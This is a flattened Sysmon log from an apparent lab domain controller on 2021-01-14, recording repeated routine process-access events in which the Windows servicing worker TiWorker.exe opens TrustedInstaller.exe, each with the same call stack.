13:30:29.810{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.810{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.810{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.795{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.779{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.779{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.763{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.763{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.763{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.763{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.763{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.748{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.748{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 